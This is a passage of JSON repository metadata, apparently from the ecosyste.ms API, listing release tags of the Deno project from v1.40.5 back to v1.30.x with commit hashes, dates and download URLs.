05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/de